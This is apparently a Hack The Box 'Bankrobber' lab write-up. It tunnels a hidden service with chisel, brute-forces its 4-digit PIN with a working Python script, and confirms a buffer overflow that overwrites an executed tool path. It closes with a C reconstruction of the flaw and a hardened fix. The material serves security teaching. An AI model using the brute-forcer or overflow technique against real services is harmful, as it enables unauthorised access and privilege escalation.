Bankv2


While enumerating the network, I discovered that port 910 is up and listening. This wasn't the case during the recon phase; it is likely due to the firewall.

It has a PID of 1588.

c:\Users\Cortin>Powershell -C ps -PID 1588
 
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName                                                  
-------  ------    -----      -----     ------     --  -- -----------                                                  
     58       5      624        284              1588   0 bankv2     

There is a process, bankv2, with PID 1588. This process is responsible for the TCP listener on port 910.

c:\> dir
 Volume in drive C has no label.
 Volume Serial Number is 3307-A1DE
 
 directory of c:\
 
25-04-2019  16:50            57.937 bankv2.exe
24-04-2019  21:27    <DIR>          PerfLogs
21-10-2022  10:32    <DIR>          Program Files
21-10-2022  10:34    <DIR>          Program Files (x86)
24-04-2019  15:52    <DIR>          Users
11-01-2021  15:17    <DIR>          Windows
24-04-2019  21:18    <DIR>          xampp
               1 File(s)         57.937 bytes
               6 Dir(s)   5.207.052.288 bytes free

This must be it. Unfortunately, there was nothing I could do to interact with the binary: I couldn't even read its permission bits, let alone execute it.

In order to interact with the bankv2 service, I would need to tunnel port 910 back to my Kali host.

Tunneling


C:\tmp>copy \\10.10.14.10\smb\chiselx64.exe .
copy \\10.10.14.10\smb\chiselx64.exe .
        1 file(s) copied.

Chisel transferred to the target system over SMB.

┌──(kali㉿kali)-[~/archive/htb/labs/bankrobber]
└─$ chisel server -p 55555 --reverse
2023/01/24 04:16:39 server: Reverse tunnelling enabled

Starting a Chisel server on Kali port 55555 with reverse tunnelling enabled.

C:\tmp> chiselx64.exe client 10.10.14.10:55555 R:9100:910
 chiselx64.exe client 10.10.14.10:55555 R:9100:910
2023/01/24 02:17:18 client: Connecting to ws://10.10.14.10:55555
2023/01/24 02:17:18 client: Connected (Latency 31.0116ms)

From the target system, the Chisel client connects to the Kali Chisel server on port 55555 and reverse-forwards the target's port 910 to Kali port 9100. Target port 910 should now be reachable through Kali port 9100.

┌──(kali㉿kali)-[~/archive/htb/labs/bankrobber]
└─$ nmap -p9100 127.0.0.1    
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-24 04:20 CET
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00015s latency).
 
PORT     STATE SERVICE
9100/tcp open  jetdirect
 
Nmap done: 1 IP address (1 host up) scanned in 0.02 seconds

It's open. I can now interact with the bankv2 service.

Internet E-Coin Transfer System


┌──(kali㉿kali)-[~/…/htb/labs/bankrobber/bankv2]
└─$ nc 127.0.0.1 9100            
 --------------------------------------------------------------
 Internet E-Coin Transfer System
 International Bank of Sun church
                                        v0.1 by Gio & Cneeliz
 --------------------------------------------------------------
 please enter your super secret 4 digit pin code to login:
 [$]

Simply connecting to the service via Netcat reveals that it is a custom application. It claims to be the Internet E-Coin Transfer System; I guess that it's a command-line version of the web app.

I tried to see how the app behaves by entering a 4-digit PIN; the digits were denied and the service disconnected. With only 10,000 possible PINs, this appears to be resolvable with brute-forcing.

Python Brute-Forcer


┌──(kali㉿kali)-[~/…/htb/labs/bankrobber/bankv2]
└─$ cat bruteforcer.py 
#!/usr/bin/env python3
import socket

host = str(input("Target Host: "))
port = int(input("Target Port: "))

# Try every 4-digit PIN from 0000 to 9999. The service drops the connection
# after a wrong guess, so each attempt needs a fresh socket, and the socket
# is closed on every path (the original leaked it on the "continue" branch).
for i in range(10000):
    pin = f"{i:04d}"
    print(f"Attempting: {pin}")
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((host, port))
        s.recv(1024)                       # banner and PIN prompt
        s.sendall(pin.encode("ascii") + b"\n")
        res = s.recv(1024)
    if b"Access denied" in res:
        continue
    print(f"\n\nAuthorized Digits Found: {pin}")
    break

I created a very simple Python script to brute-force the authentication. It opens a new connection per attempt because the service disconnects after every wrong PIN.

┌──(kali㉿kali)-[~/…/htb/labs/bankrobber/bankv2]
└─$ python3 bruteforcer.py
Target Host: 127.0.0.1
Target Port: 9100
Attempting: 0001
Attempting: 0002
Attempting: 0003
Attempting: 0004
Attempting: 0005
Attempting: 0006
Attempting: 0007
Attempting: 0008
Attempting: 0009
Attempting: 0010
Attempting: 0011
Attempting: 0012
Attempting: 0013
Attempting: 0014
Attempting: 0015
Attempting: 0016
Attempting: 0017
Attempting: 0018
Attempting: 0019
Attempting: 0020
Attempting: 0021
 
 
Authorized Digits Found: 0021

Executing the Python script reveals the correct 4-digit PIN: 0021.

transfer.exe


┌──(kali㉿kali)-[~/…/htb/labs/bankrobber/bankv2]
└─$ nc 127.0.0.1 9100
 --------------------------------------------------------------
 Internet E-Coin Transfer System
 International Bank of Sun church
                                        v0.1 by Gio & Cneeliz
 --------------------------------------------------------------
 please enter your super secret 4 digit pin code to login:
 [$] 0021
 [$] PIN is correct, access granted!
 --------------------------------------------------------------
 please enter the amount of e-coins you would like to transfer:
 [$] 10 
 [$] Transfering $10 using our e-coin transfer application. 
 [$] executing e-coin transfer tool: C:\Users\admin\Documents\transfer.exe
 
 [$] Transaction in progress, you can safely disconnect...

Once authenticated, the app prompts for the amount of e-coins to transfer. I put 10 for testing, and it appeared to execute a binary, C:\Users\admin\Documents\transfer.exe, to transfer the amount.

c:\Users>cd admin
Toegang geweigerd.

I don't have permission to access the C:\Users\admin\ directory, let alone the binary.

Buffer Overflow


┌──(kali㉿kali)-[~/…/htb/labs/bankrobber/bankv2]
└─$ nc 127.0.0.1 9100     
 --------------------------------------------------------------
 Internet E-Coin Transfer System
 International Bank of Sun church
                                        v0.1 by Gio & Cneeliz
 --------------------------------------------------------------
 Please enter your super secret 4 digit PIN code to login:
 [$] 0021
 [$] PIN is correct, access granted!
 --------------------------------------------------------------
 Please enter the amount of e-coins you would like to transfer:
 [$] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 [$] Transfering $AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA using our e-coin transfer application. 
 [$] Executing e-coin transfer tool: AAAAAAAAAAAAAAAAAA
 
 [$] Transaction in progress, you can safely disconnect...

Testing for a buffer overflow, the amount field does appear to overflow: I placed 50 A's into the amount, and the last 18 of them overwrote the original transfer tool path, C:\Users\admin\Documents\transfer.exe. That leaves 50 minus 18, i.e. 32 bytes, for the amount itself.

Let me confirm this a better way.

┌──(kali㉿kali)-[~/archive/htb/labs/bankrobber]
└─$ patterncreate -l 32       
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab

I generated a pattern of 32 characters.

I will append the suffix BufferOverflowed to the pattern.

A buffer overflow is confirmed in the amount parameter. The confirmed buffer length is 32, and the rest of the input has overwritten the transfer tool field, where BufferOverflowed can be seen.

There is a high chance that the transfer tool field is executed via a direct system command such as cmd.exe /c $transferTool. If that is the case, I can overwrite the transfer tool field with a payload of my choice. This strongly appears to be a privilege escalation vector.
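To show what the observations above imply about the program, here is an added C example; it is not bankv2's source, which was never readable, but a reconstruction built from the behaviour seen on the wire. It assumes the layout the numbers suggest: a 32-byte amount buffer followed immediately by the transfer tool path, with user input copied into the amount without a length check. The struct, the function names `set_amount_vulnerable` and `set_amount_hardened`, and the 64-byte tool field are assumptions. The vulnerable routine reproduces both results from the page (50 A's leave 18 A's in the tool field; the 32-character pattern plus BufferOverflowed leaves exactly BufferOverflowed there), and the hardened routine is the fix a developer would apply: reject input that does not fit the field and anything that is not a plain decimal amount.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Assumed record layout (reconstructed from the observed overflow, not
 * bankv2's real source): 32 bytes of amount, then the tool path. */
#define AMOUNT_LEN 32
#define TOOL_LEN   64

struct transfer_request {
    char amount[AMOUNT_LEN];
    char tool[TOOL_LEN];
};

/* Tool path taken from the service's own output. */
static const char DEFAULT_TOOL[] = "C:\\Users\\admin\\Documents\\transfer.exe";

void request_init(struct transfer_request *r)
{
    memset(r, 0, sizeof *r);
    strcpy(r->tool, DEFAULT_TOOL);          /* 37 chars + NUL fits in 64 */
}

/* Vulnerable version: copies the whole line into the record starting at
 * the amount field with no per-field bound. Everything past byte 32 lands
 * in the tool field. The copy is capped at the record size only so that
 * this demo process cannot corrupt its own stack. */
int set_amount_vulnerable(struct transfer_request *r, const char *input)
{
    size_t n = strlen(input) + 1;           /* include the terminator */
    if (n > sizeof *r)
        n = sizeof *r;                      /* demo guard, not a real fix */
    memcpy((char *)r, input, n);
    return 0;
}

/* Hardened version: the input must fit in the amount field and consist
 * only of decimal digits, so the tool field is never reachable from input. */
int set_amount_hardened(struct transfer_request *r, const char *input)
{
    size_t len = strlen(input);
    if (len == 0 || len >= AMOUNT_LEN)
        return -1;                          /* too long for the field */
    for (size_t i = 0; i < len; i++)
        if (!isdigit((unsigned char)input[i]))
            return -1;                      /* not a plain amount */
    memcpy(r->amount, input, len);
    r->amount[len] = '\0';
    return 0;
}

static void show(const char *label, const struct transfer_request *r)
{
    /* %.32s: the amount may have no terminator after an overflow */
    printf("%s: amount=\"%.32s\" tool=\"%s\"\n", label, r->amount, r->tool);
}

int main(void)
{
    /* Inputs constructed to match the page: 50 A's, and the 32-char
     * pattern with the BufferOverflowed suffix. */
    const char *fifty_a = "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA"
                          "AAAAAAAAAA" "AAAAAAAAAA";
    const char *pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab" "BufferOverflowed";
    struct transfer_request r;

    request_init(&r);
    set_amount_vulnerable(&r, "10");
    show("vulnerable, 10", &r);
    request_init(&r);
    set_amount_vulnerable(&r, fifty_a);
    show("vulnerable, 50 A's", &r);
    request_init(&r);
    set_amount_vulnerable(&r, pattern);
    show("vulnerable, pattern", &r);
    request_init(&r);
    printf("hardened, 50 A's: rc=%d\n", set_amount_hardened(&r, fifty_a));
    show("hardened, 50 A's", &r);
    return 0;
}
```

The two results line up with the session above: 50 minus 32 is the 18 A's that appeared in the tool field, and with the 32-byte pattern consuming the amount buffer exactly, the suffix is all that reaches the path. The hardened routine leaves the record untouched on rejection, which is the property that matters: the field that names the executable must never be writable from the network.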